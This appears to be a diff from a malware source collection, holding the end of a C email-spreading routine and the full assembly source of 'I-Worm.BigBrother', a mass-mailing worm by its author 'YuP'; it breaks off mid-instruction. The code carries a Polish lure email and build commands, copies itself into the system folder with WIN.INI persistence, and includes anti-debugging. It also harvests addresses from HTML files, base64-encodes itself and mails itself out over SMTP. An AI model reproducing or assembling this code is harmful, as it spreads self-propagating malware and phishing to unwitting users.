+(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); +mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); +if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { + do { + if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { + strcpy(mname,mes->lpOriginator->lpszName); + strcpy(maddr,mes->lpOriginator->lpszAddress); + + for(i=0;i<8;i++) + attname[i+5]='1'+(char)(9*rand()/RAND_MAX); + fsubj[0]=0; + wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]); + + + mes->ulReserved=0; + mes->lpszSubject=fsubj; + mes->lpszNoteText="This is some news send by our firm about security.\n" + "Please read by clicking on attached file.\n" + "\tBest Regards"; + mes->lpszMessageType=NULL; + mes->lpszDateReceived=NULL; + mes->lpszConversationID=NULL; + mes->flFlags=MAPI_SENT; + mes->lpOriginator->ulReserved=0; + mes->lpOriginator->ulRecipClass=MAPI_ORIG; + mes->lpOriginator->lpszName=mes->lpRecips->lpszName; + mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; + mes->nRecipCount=1; + mes->lpRecips->ulReserved=0; + mes->lpRecips->ulRecipClass=MAPI_TO; + mes->lpRecips->lpszName=mname; + mes->lpRecips->lpszAddress=maddr; + mes->nFileCount=1; + mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); + memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); + mes->lpFiles->ulReserved=0; + mes->lpFiles->flFlags=NULL; + mes->lpFiles->nPosition=-1; + mes->lpFiles->lpszPathName=filen; + mes->lpFiles->lpszFileName=attname; + mes->lpFiles->lpFileType=NULL; + mSendMail(session, NULL, mes, NULL, NULL); + } + }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); +free(mes->lpFiles); +mFreeBuffer(mes); +mLogoff(session,0,0,0); +FreeLibrary(hMAPI); +} + +*/ + +ExitProcess(0); +} + +void infzip(char *folder) +{ +register bool abc=TRUE; +register HANDLE fh; +if(strlen(folder)!=0) { +SetCurrentDirectory(folder); +fh=FindFirstFile("*.zip",&ffile); 
+if(fh!=INVALID_HANDLE_VALUE) {
+ while(abc) {
+ inzip[0]=0;
+ wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
+ WinExec(inzip,1);
+ abc=FindNextFile(fh,&ffile);
+ }
+}
+}
+
+}
diff --git a/Win32/I-Worm.BigBrother.asm b/Win32/I-Worm.BigBrother.asm
new file mode 100644
index 00000000..6ec23576
--- /dev/null
+++ b/Win32/I-Worm.BigBrother.asm
@@ -0,0 +1,1555 @@ +;================================================================================================ +; :: +; #####################++++++++++++++++++ +; #:I-Worm.BigBrother # ! + +; ####################*################## +; + ! #:BioCoded by YuP # +; ++++++++++++++++++++################### +; :: +; +; +; +; +; [Disclaimer] +; ^~^~^~^~^~^~^ +; This file is a demonstration of WINASM coding. Educational purposes only! +; Author is not responsabile of any kind of damages which may occur after the +; asembly of this file. +; I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE. +; +; [2002 CURRENT NOTES] +; This worm is so old that i don't remember when i have coded it, +; it is VERY VERY LAME! IT WAS CODED IN THIS TIMES WHEN I THOUHGT +; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE! +; SO IT IS GOOD FOR LAMMIEZ! +; +; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net +; [current greetz for all guyz from #virus and TKT memberz!] +; +; +; +; +; [Greetz] +; ^~^~^^~^ +; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>. +; * T-2000 / Immortal Riot (4 base encoder sample). +; +; Otherz (pozdrufka) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz, +; tompaw69, PlayerPL, Grabarz (dragon bratha) +; Crash and otherz polish coderz. +; +; Bonus thx to: Dla Karolinki (z BB) -jestes tak glupia ,ze mi cie szkoda. +; (natchnienie) Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma, +; Balon. +; +; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group +; +; [How to Compile] +; ^~^~^~^~^~^~^~^ +; %: tasm32 /m1 /mx big.asm +; %: tlink32 /Tpe /aa big,big,,import32.lib +; %: brc32 big.res +; +; % NOTE. 
File is also compressed & encrypted by tElock tool ,ver.051 +; +; +; +; [Info] +; ^~^~^~ +; .:[SUPPORT.AVX.COM]: (my commentz in *[]*) +; +; +; +; Details: +;--------- +;Name : I-Worm.BigBrother +;Type: Internet Worm +;Aliases: none +;Size: 12800 bytes +; +;At the time of writing this we have only received one report of infection. +; +; +;Description: +;--------------- +;This is a virus which arrives in your e-mail in the following formatt: +; +;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl +;Subject: BIGBROTHER SHOW ! +; +;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to +;zrobic? Wystarczy ze uruchomisz specjalny program +;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci. +;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie +;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda +;nagrody (telewizory, wieze stereo, +;komputery ...i wiele ,wiele innych). Prosimy przysylac +;opinie i komentarze na temat programu. +; +; +;Zyczymy milej zabawy: +; +;Redakcja programu. +; +;Attachment: BigBrother_Live_Camera.exe +; +;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name: ;b1g_brother.exe +;and adds the following line in WIN.INI: in the section [windows] +; +;run=c:\Windows\System\b1g_brother.exe +; +;After that it checks if the computer is connected to the Internet and then starts sending itself ;through e-mail in the format presented above. +; +;In order to get e-mail addresses it scans all hard drives for html files and it search inside ;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in +;My Documents folder na Temp]* +; +;In case of running the b1g_brother.exe manually it shows the following message: +;SEGMENTATION FAULT. +;Please REPORT this BUG. 
+; + +;Payload: +;----------- +;On May 13 it displays the following message: + +;You like to think youre never wrong +;You want to act like youre someone +;You want someone to hurt like you +;You want to share what youve been through +;You live what you learn... +; +;Today you know the truth: i-worm.BigBrother +;Now contact with yourz AV expert. +;Future , Don't trust anyone ... +; [YuP/0ne Earth] +;payyes *[what?]* + +;Detection has been added. +; +; +; +; +; [Bugz] +; ^~^~^~ +; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be. +; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out). +; I don't know why ;) i don't have any time to check it with any debugER ;] +; do it yourself if you want of coz. This is my 1st i-worm and its very +; 'low-coded' i think ... The next onez should be better. +; +; +;================================================================================================ +; [L]etz [S]tart +; oO-= Have fun! =-Oo +;================================================================================================ + +.486p +locals +jumps +.model flat,STDCALL + +extrn ExitProcess:PROC ;i love it +extrn CopyFileA:PROC ;did i miss sth ? 
+extrn MessageBoxA:PROC +extrn SetFileAttributesA:PROC +extrn GetSystemDirectoryA:PROC +extrn lstrcatA:PROC +extrn lstrcpyA:PROC +extrn CreateFileA:PROC +extrn ExitWindowsEx:PROC +extrn Sleep:PROC +extrn CreateMutexA:PROC +extrn GetCurrentProcessId:PROC +extrn LoadLibraryA:PROC +extrn GetProcAddress:PROC +extrn PeekMessageA:PROC +extrn OpenMutexA:PROC +extrn RegOpenKeyExA:PROC +extrn RegQueryValueExA:PROC +extrn RegCloseKey:PROC +extrn FindFirstFileA:PROC +extrn FindNextFileA:PROC +extrn CreateFileA:PROC +extrn CloseHandle:PROC +extrn ReadFile:proc +extrn CharNextA:PROC +extrn lstrcpyn:PROC +extrn lstrlenA:PROC +extrn lstrcmp:PROC +extrn lstrcpy:PROC +extrn FindClose:PROC +extrn GetTopWindow:PROC +extrn GetNextWindowA:PROC +extrn PostMessageA:PROC +extrn GetActiveWindow:PROC +extrn GetTempPathA:PROC +extrn send:PROC +extrn recv:PROC +extrn WSAStartup:PROC +extrn WSACleanup:PROC +extrn socket:proc +extrn connect:PROC +extrn gethostbyname:PROC +extrn closesocket:PROC +extrn lstrlen:PROC +extrn WinExec:PROC +extrn lstrcmpi:PROC +extrn ReleaseMutex:PROC +extrn GetFileSize:PROC +extrn WriteFile:PROC +extrn GetModuleFileNameA:PROC +extrn GetCurrentDirectoryA:PROC +extrn _lread:PROC +extrn SetCurrentDirectoryA:PROC +extrn WriteProfileStringA:PROC +extrn RegCreateKeyA:PROC +extrn RegOpenKeyA:PROC + +;extrnz for payload +extrn SetTextColor:PROC +extrn GetDC:PROC +extrn TextOutA:PROC +extrn CreateFontA:PROC +extrn SelectObject:PROC +extrn LineTo:PROC +extrn GetSystemTime:PROC +extrn SetBkColor:PROC +extrn CreatePen:PROC + + + +.DATA + + +signature db "[I-WORM.BigBr0th3r] (c) YuP",0 + db "Greetz to all #PHREAKPL CREW",0 + db "and #VXERS TERRORIST GROUP.",0 + db "Special thx goez to: Dageshi",0 + db "& detergent ",0 + db "-=* GOOD WORK AV PEOPLE ;P *=-",0 + +myname db 256 dup(?) +new db '\b1g_brother.exe',0 +sysD db 256 dup(?) +sysDD db 256 dup(?) +tempD db 256 dup(?) 
+markerr db 'rundll32 kernel,FatalExit',0 +krnl db 'KERNEL32.DLL',0 +krnl_proc db 'RegisterServiceProcess',0 +mutex_name db 'Kakaroth',0 +mutexH dd ? +sys_name db 'b1g_brother.exe',0 + +module_filename db 256 dup(?) +dir db 1024 dup(?) +bslash db '\',0 + +;check connection +hang_connection db 'InternetHangUp',0 +check_connection db 'InternetGetConnectedState',0 +wininet_lib db 'WININET.DLL',0 +lpdwFlagz dd 0 + + +ini_key db 'run',0 +ini_sect db 'windows',0 + + + +;FOR REGISTRY +HKEY_LOCAL_MACHINE equ 80000001h +HKEY_CURRENT_USER equ 80000001h +hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 +hPersonal db 'Personal',0 +PersonalF db 128 dup(0) +PersonalFsize dd 128 +hKeyHandle dd 0 +my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0 +shit dd 0 +shitshit dd 0 + +server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0 +server_h dd 0 +server_s db 'SMTP Server',0 +server db 128 dup(0) +server_size dd 128 + +;FOR SEARCH +fMASK db '\*.htm*',0 +fMASK1 db '*.htm*',0 +break db '\',0 +oldd dd 128 dup(0) +bus db 260 dup(0) ;search buffer ;] +fsH dd ? +fHnd dd ? +sciezka db 260 dup(0) + +WIN32_FIND_DATA struc +dwFileAttributes dd 0 +dwLowDateTime0 dd ? ; creation +dwHigDateTime0 dd ? +dwLowDateTime1 dd ? ; last access +dwHigDateTime1 dd ? +dwLowDateTime2 dd ? ; last write +dwHigDateTime2 dd ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved dd 0,0 +cFileName db 260 dup(0) +cAlternateFilename db 14 dup(0) + db 2 dup(0) +WIN32_FIND_DATA ends + +find_data WIN32_FIND_DATA + +;for e-mailz +mail db 'mailto:',0 +worm_size equ 10000h +worm_code db worm_size dup(0) +fH dd ? +searchH dd ? +counter equ 0 +longBuff dd ? +clear db '',0 +myB db 128 dup(?) 
+L1 db '"',0 +mail_string db 128 dup(0) +mail_good db 128 dup(0) +sep db '',0 + +;======================[BASE ENCODE DATA]=============================== +base_file db '00000b.rat',0 +base_file_name db 128 dup(0) +base_to_code db '000000s.b64',0 +base_to_code_buff db 128 dup(0) + +Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + DB 'abcdefghijklmnopqrstuvwxyz' + DB '0123456789+/' + +Input_Buffer DB 200 DUP(0) +Output_Buffer DB 200 DUP(0) + +base_buff_size equ 18516 +base_buffer DB base_buff_size DUP(0) +base_size dd 0 +baL dd ? + + + + +input_handle dd ? +Input_Handle dd ? +output_handle dd ? +Output_Handle dd ? + +IO_Bytes_Count DD 0 + +OPEN_EXISTING EQU 00000003h +CREATE_ALWAYS EQU 00000002h +FILE_ATTRIBUTE_NORMAL EQU 00000080h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h + +;============[E-MAIL CLIEN7]======================== +HELO db 'HELO bigbrother.r0x.pl',0dh,0ah + + +mime_code db 'From: "BIGBROTHER TVN POLSKA" ',0dh,0ah + db 'Subject: BIGBROTHER SHOW !',0dh,0ah + db 'MIME-Version: 1.0',0dh,0ah + db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah + db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah + db 0dh,0ah + db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah + db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah + db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah + db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah + db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah + db 'nagrody (telewizory, wieze stereo,',0dh,0ah + db 'komputery ...i wiele ,wiele innych). 
Prosimy przysylac',0dh,0ah + db 'opinie i komentarze na temat programu.',0dh,0ah + db 0dh,0ah + db 0dh,0ah + db 'Zyczymy milej zabawy:',0dh,0ah + db 0dh,0ah + db 'Redakcja programu.',0dh,0ah + db '',0dh,0ah + db 0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"' + db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah + db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah + +mime_end db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0 +mime_e equ mime_end + +dot db '.',0dh,0ah + +RCPT_1 db 'RCPT TO:<',0 +RCPT_ENDD db '>',0dh,0ah,0 + +RCPT db 160 dup (?) + + +MAIL_FROM db 'MAIL FROM:',0dh,0ah + +QUIT db 'QUIT',0dh,0ah +_DATA_ db 'DATA',0dh,0ah + +e_end db '',0 + + + +;==================================[END MAIL DATA]==================================== + +;==================================[WIN SOCKZ]======================================== + +addr struc +proto dw 2 +port dw 1900h +ip db 127,0,0,1 +addr ends + +addr2 addr <> + + +sock dd ? +SOCK_STREAM EQU 1 +AF_INET EQU 2 +WSA_Data DB 400 DUP(0) +SOCKET_ERR equ -1 +HOSTENT_IP equ 10h + +rB dd ? +;==================[END WIN SOCKZ]========================================= + +;============[END E-MAIL DATA]============================================= + +;FOR STEALTH +err_title db 'Setup',0 +markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah + db 'Please REPORT this BUG.',0 + db 0dh,0ah,0 + + +;PAYLOAD + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* +;===========[PAYL0AD ;))]================================================== +dcH dd ? +brH dd ? +fontH dd ? 
;~^~^~^~^~^~^~^^~^~^~^~^ +info_line_1 db "You like to think youre never wrong",0 ;some lyrics from: +info_line_2 db "You want to act like youre someone",0 ;'POINTS OF AUTHORITY' - song +info_line_3 db "You want someone to hurt like you",0 ;of my best music group - +info_line_4 db "You want to share what youve been through",0 ;[L]inkin [P]ark ;)) +info_line_5 db "You live what you learn...",0 ;~^~^~^~^~^~^~^~^~^~^~^~^ + +info_line_6 db "Today you know the truth: i-worm.BigBrother",0 ;some txt from myself +info_line_7 db 'Now contact with yourz AV expert.',0 +info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0 + +sysTimeStruct db 16 dup(0) + +payday db 128 dup(0) +payyes db 'payyes',0 + +;===========[END PAY DATA]================================================= +;-------------------------------------------------------------------------* +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* +;-------------------------------------------------------------------------* +;===========[CODE SECTION]================================================= + +.CODE +Kakaroth: +push 256 +push offset module_filename +push 0 +call GetModuleFileNameA + +xor ebp,ebp +mov ebp,offset module_filename + +push offset dir +push 256 +call GetCurrentDirectoryA + +push offset bslash +push offset dir +call lstrcatA + +push offset dir +call lstrlen +mov edi,eax + +sub ecx,edi + +C_NEXT: +push ebp +call CharNextA +mov ebp,eax + +dec edi +jnz C_NEXT + +push ecx +push ebp +push offset myname +call lstrcpyn + +@DEBUG_CODE: +lea eax,dword ptr [esp-8h] +xor esi,esi +xchg eax,dword ptr fs:[esi] +lea edi,exception +push edi + + +push eax + +call @antidebug + +@antidebug: +add esp,4 +cmp esi,dword ptr fs:[esi+20h] +je @SKIP_DEBUG +jmp @HEART_STOPS + +@SKIP_DEBUG: +push 0 +push 0 +push 0 +push 0 +push 0 +call PeekMessageA + +@COPY_FILE: +push 256 +push offset sysD +call GetSystemDirectoryA + +xor eax,eax + +push offset new +push offset sysD +call lstrcatA +cmp eax,0 +jc 
@EXIT + +push 0 +push offset sysD +push offset myname +call CopyFileA +cmp eax,0 +jc @EXIT + +push 01h OR 02h +push offset sysD +call SetFileAttributesA + +push offset myname +push offset sys_name +call lstrcmpi +cmp eax,0 +jne @RUN_SYS_FILE + +@_CHECK_4_PAYLOAD: +push offset sysTimeStruct +call GetSystemTime +xor eax,eax +lea eax,sysTimeStruct +cmp word ptr [eax+2],5 ; 13th May +jne @SKIP_PAY +cmp word ptr [eax+6],13 +jne @SKIP_PAY + + +@PAY: ;payload +push 50000 ;sp00ky one ;)) +call Sleep ;wait some time + +push 0h +call GetDC +mov dword ptr [dcH],eax + +push 0 +push 1000h +push 1 +call CreatePen +mov dword ptr [brH],eax + +push dword ptr [brH] +push dword ptr [dcH] +call SelectObject + +push 500 +push 300 +push dword ptr [dcH] +call LineTo + +;=======[FONT]================================================= +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0 +push 0 +push 13 +push 23 +call CreateFontA +mov dword ptr [fontH],eax + + +push dword ptr [fontH] +push dword ptr [dcH] +call SelectObject + + + +push 0 +push dword ptr [dcH] +call SetBkColor + + +push 16777215 ;color - white +push dword ptr [dcH] +call SetTextColor + + +;======[END FONT]=========================================== + + +@TEXT: +push 16777215 +push dword ptr [dcH] +call SetTextColor + +mov esi,160 +mov edx,offset info_line_1 +mov ecx,140 +call @TEXT_OUT + +mov edx,offset info_line_2 +mov ecx,170 +call @TEXT_OUT + +mov edx,offset info_line_3 +mov ecx,200 +call @TEXT_OUT + +mov edx,offset info_line_4 +mov ecx,230 +call @TEXT_OUT + +mov edx,offset info_line_5 +mov ecx,260 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_6 +mov ecx,350 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_7 +mov ecx,380 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_8 +mov ecx,435 +call @TEXT_OUT + +push offset payyes +push offset payday +call lstrcatA + +call @SKIP_PAY + + +@TEXT_OUT: ;text-out function +push edx +call lstrlenA + +push eax +push edx +push 
ecx +push esi +push dword ptr [dcH] +call TextOutA + +ret + + +@SKIP_PAY: +@RESIDENT: +push offset mutex_name ;am i in memory now ? +push 0 +push 1 +call OpenMutexA +cmp eax,0 +jne @I_WAS_HERE +je @NEXT_ + +@I_WAS_HERE: +push 010h +push offset err_title +push offset markerror +push 0h +call MessageBoxA +push 0h +call ExitProcess + +@NEXT_: +push offset mutex_name ;nop then go there +push 1 +push 0 +call CreateMutexA +mov dword ptr [mutexH],eax + +xor edx,edx +xor eax,eax + +push offset krnl +call LoadLibraryA +cmp eax,0 +jc @EXIT +push offset krnl_proc +push eax +call GetProcAddress +or eax,eax +jz @PR +mov edx,eax + +call GetCurrentProcessId + +;push 1 +;push eax +;call edx + +@PR: +push offset sysD +push offset ini_key +push offset ini_sect +call WriteProfileStringA + + +call @GET_MAILZ_START + +@GET_MAILZ_START: +xor eax,eax +push offset hKeyHandle +push 0 +push 0 +push offset hKeyPath +push HKEY_LOCAL_MACHINE +call RegOpenKeyExA +cmp eax,0 +jne @EXIT + +push offset PersonalFsize +push offset PersonalF +push 0 +push 0 +push offset hPersonal +push hKeyHandle +call RegQueryValueExA + +push offset server_h +push 0 +push 0 +push offset server_p +push HKEY_CURRENT_USER +call RegOpenKeyExA +cmp eax,0 +jne @EXIT + +push offset server_size +push offset server +push 0 +push 0 +push offset server_s +push server_h +call RegQueryValueExA + +;PersonalF -> like My Docz + +push hKeyHandle +call RegCloseKey + + + + +push offset base_file_name +push 260 +call GetTempPathA + +push offset base_file +push offset base_file_name +call lstrcatA + + +;=======================[BASE ENCODER]========================== +;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) + +; * dageshi (4 everything) + +;=============================================================== +@_BASE_ENCODER: + + +push offset base_to_code_buff ;copy source file +push 260 +call GetTempPathA + +push offset base_to_code +push offset base_to_code_buff +call lstrcatA + +push 1 +push offset base_to_code_buff 
+push offset sysD +call CopyFileA + + +;ble ble ble + + +XOR EBX, EBX + +PUSH EBX +PUSH FILE_ATTRIBUTE_NORMAL +PUSH OPEN_EXISTING +PUSH EBX +PUSH EBX +PUSH GENERIC_READ +PUSH OFFSET base_to_code_buff +CALL CreateFileA + +MOV [Input_Handle], EAX + +PUSH EBX +PUSH FILE_ATTRIBUTE_NORMAL +PUSH CREATE_ALWAYS +PUSH EBX +PUSH EBX +PUSH GENERIC_WRITE +push OFFSET base_file_name +CALL CreateFileA + +MOV [Output_Handle], EAX + +PUSH 0 ;wpiszem standard +PUSH OFFSET IO_Bytes_Count +PUSH (offset mime_end-offset mime_code) +push offset mime_code +PUSH [Output_Handle] +CALL WriteFile +cmp eax,0 +je @ERROR + +PUSH EBX ;size +PUSH [Input_Handle] +CALL GetFileSize + +CDQ +MOV ECX, (76/4)*3 +DIV ECX + +DEC EDX +JS No_Round + +INC EAX + +No_Round: +XCHG ECX, EAX + +Encode_Line: +PUSH ECX + +MOV ESI, OFFSET Input_Buffer + +PUSH 0 +PUSH OFFSET IO_Bytes_Count +PUSH (76/4)*3 +PUSH ESI +PUSH [Input_Handle] +CALL ReadFile + +MOV EDI, OFFSET Output_Buffer + +PUSH EDI + +PUSH 76/4 +POP ECX + +Encode_Packet: +PUSH ECX + +MOV CL, 8 + +LODSB +SHL EAX, CL + +LODSB +SHL EAX, CL + +LODSB +SHL EAX, CL + +MOV EBX, OFFSET Encoding_Table + +MOV CL, 4 + +Encode_Byte: +SHR EAX, 2 + +ROL EAX, 8 + +XLAT +STOSB + +LOOP Encode_Byte + +POP ECX + +LOOP Encode_Packet + +MOV WORD PTR [EDI], 0A0Dh ; . 
+ +POP EAX + +PUSH 0 +PUSH OFFSET IO_Bytes_Count +PUSH 78 +PUSH EAX +PUSH [Output_Handle] +CALL WriteFile + +POP ECX + +LOOP Encode_Line + +push [Output_Handle] +call CloseHandle + + +;=====================================================[END BASE ENCODER]=========== + +;=====================================================[GET BASE CODE TO BUFF]====== + +@GET_BASE_CODE: +push 00000000h +push 00000080h +push 00000003h +push 00000000h +push 00000001h +push 80000000h +push offset base_file_name +call CreateFileA +mov edi,eax + + +push 0 +push edi +call GetFileSize + + +push 0 +push offset baL +push eax +push offset base_buffer +push edi +call ReadFile + +;=====================================================[END GETTING]=============== +@NEXT__: +push offset shitshit +push offset my_key +push HKEY_LOCAL_MACHINE +call RegOpenKeyA +cmp eax,0 +je @EXIT + +push offset shit +push offset my_key +push HKEY_LOCAL_MACHINE +call RegCreateKeyA + +mov bh,0 +mov bl,0 +CALL @SCAN_MYDOCZ + +@SCAN_TEMP: +push offset tempD +push 260 +call GetTempPathA + +push offset clear +push offset bus +call lstrcpyA + +push offset tempD +push offset bus +call lstrcpyA + +push offset fMASK1 ;add +push offset bus +call lstrcatA + + +call @FIND_1st +call @GO_GO1 + +@SCAN_MYDOCZ: +xor edi,edi + +push offset clear +push offset bus +call lstrcpyA + +push offset PersonalF +push offset bus +call lstrcpyA + +push offset fMASK ;add +push offset bus +call lstrcatA + +call @FIND_1st +call @GO_GO + +@FIND_1st: + +push offset find_data +push offset bus +call FindFirstFileA +mov dword ptr [searchH],eax +cmp eax,-1 +je @ERROR + +ret + +@CLEAR_PATH: +push offset clear +push offset sciezka +call lstrcpyA +ret + +@GO_GO: +call @CLEAR_PATH +xor edi,edi +push offset PersonalF +push offset sciezka +call lstrcatA +push offset break +push offset sciezka +call lstrcatA +push offset find_data.cFileName +push offset sciezka +call lstrcatA +xor edi,edi +mov edi,offset sciezka +call @SCAN_HTM_FILE_STEP1 + +@GO_GO1: +call 
@CLEAR_PATH +xor edi,edi +push offset tempD +push offset sciezka +call lstrcatA +push offset break +push offset sciezka +call lstrcatA +push offset find_data.cFileName +push offset sciezka +call lstrcatA +xor edi,edi +mov edi,offset sciezka +call @SCAN_HTM_FILE_STEP1 + + + +@SCAN_HTM_FILE_STEP1: + +push 00000000h +push 00000080h +push 00000003h +push 00000000h +push 00000001h +push 80000000h +push edi +call CreateFileA +cmp eax,-1 +je @ERROR_M + +mov dword ptr [fH],eax + + +push 0h +push offset longBuff +push worm_size ;size +push offset worm_code +push dword ptr [fH] +call ReadFile +cmp eax,0 +je @ERROR_M + +call @CLEAR + +@MARK: +xor esi,esi +mov esi,0 +xor ebp,ebp +mov ebp,offset worm_code +xor edi,edi +mov edi,1 + +@ALGORITM: +xor edi,edi +mov edi,1 +call LOOPING_JOE + +push offset L1 +push offset myB +call lstrcmp +cmp eax,0 +je @CH + +inc esi +cmp esi,10000 +ja @END_OF_FILE +call @ALGORITM + +@CH: +call @CLEAR +call @CHECK_STRING + +LOOPING_JOE: +push ebp +call CharNextA +mov ebp,eax + +push 2 +push ebp +push offset myB +call lstrcpyn + +ret + + +@CHECK_STRING: +call LOOPING_JOE + +push offset myB +push offset mail_string +call lstrcatA + +inc esi +inc edi +cmp edi,8 +jne @CHECK_STRING +je @IS_IT_GOD + +@IS_IT_GOD: +push offset mail +push offset mail_string +call lstrcmp +cmp eax,0 +je @GET_MAIL +jne @ALGORITM + + +@GET_MAIL: +call LOOPING_JOE + +push offset L1 +push offset myB +call lstrcmp +cmp eax,0 +je @END_MAIL + +push offset myB +push offset mail_good +call lstrcatA + +inc esi +cmp esi,1000 +jne @GET_MAIL + +@END_MAIL: ;TU GEN MAIL + +inc bl +cmp bl,10 +ja @ERROR + +call @SEND_MAIL + +@NEXT_MAILL: +xor edi,edi +mov edi,1 + +call @ALGORITM + +@END_OF_FILE: +push dword ptr [fH] +call CloseHandle + +xor eax,eax +xor ebp,ebp +call @CLEAR +call @CLEAR_BUFF +call @FIND_NEXT_FILE + +@CLEAR: +push offset sep +push offset mail_good +call lstrcpy +push offset sep +push offset mail_string +call lstrcpy +ret + +@CLEAR_BUFF: +push offset sep +push offset worm_code 
+call lstrcpy +ret + +exception: +xor esi,esi +mov eax,dword ptr fs:[esi] +mov esp,dword ptr [eax] + +@FIND_NEXT_FILE: + +push offset find_data +push dword ptr [searchH] +call FindNextFileA +cmp eax,0 +je @ERROR_NO_FILEZ_LEFT + +cmp bh,1 +ja @GO_TO_GO1 +call @GO_GO + +@GO_TO_GO1: +call @GO_GO1 + +@ERROR: + +push dword ptr [fHnd] +call CloseHandle + +call @EXIT + +@ERROR_M: +push dword ptr [searchH] +call FindClose +call @EXIT + + +@ERROR_NO_FILEZ_LEFT: +cmp bh,2 +je @ERROR_M +ja @ERROR_M +add bh,2 +push dword ptr [searchH] +call FindClose +call @SCAN_TEMP + + +@SEND_MAIL: +push offset RCPT_1 +push offset RCPT +call lstrcatA + +push offset mail_good +push offset RCPT +call lstrcatA + +push offset RCPT_ENDD +push offset RCPT +call lstrcatA + +;======[CHECK INTERNET STATE]======= +;WININET.DLL REQUIRED :> + +;=================================== +@CHECK_CONN: +push 500 ;little stealth +call Sleep + +push offset wininet_lib +call LoadLibraryA + +push offset check_connection +push eax +call GetProcAddress +xchg eax,ecx +jecxz @INIT_W + +;push 0 +;push offset lpdwFlagz +;call ecx +;or eax,eax +;jz @CHECK_CONN + + +;======[INIT WINSOCK]================ +@INIT_W: +push offset WSA_Data +PUSH 0101h +CALL WSAStartup +cmp eax,0 +jne @EXIT + +push 0 +push SOCK_STREAM +push AF_INET +call socket +cmp eax,SOCKET_ERR +je @CLEAN +mov sock,eax + +;======[CONNECT]===================== + +;push offset server +;call gethostbyname +;cmp eax,0 +;je @CLEAN + + +;mov eax,dword ptr [eax+HOSTENT_IP] +;mov eax,dword ptr [eax] +;mov dword ptr [addr2.ip],eax + + +push 16 +push offset addr2 +push sock +call connect +cmp ax,SOCKET_ERR +je @CLEAN + +;======[READ AND SEND LOOP]========== + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 24 +push offset HELO +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 31 +push offset MAIL_FROM +push sock +call send + +push 20 +call Sleep +push 0 +push 
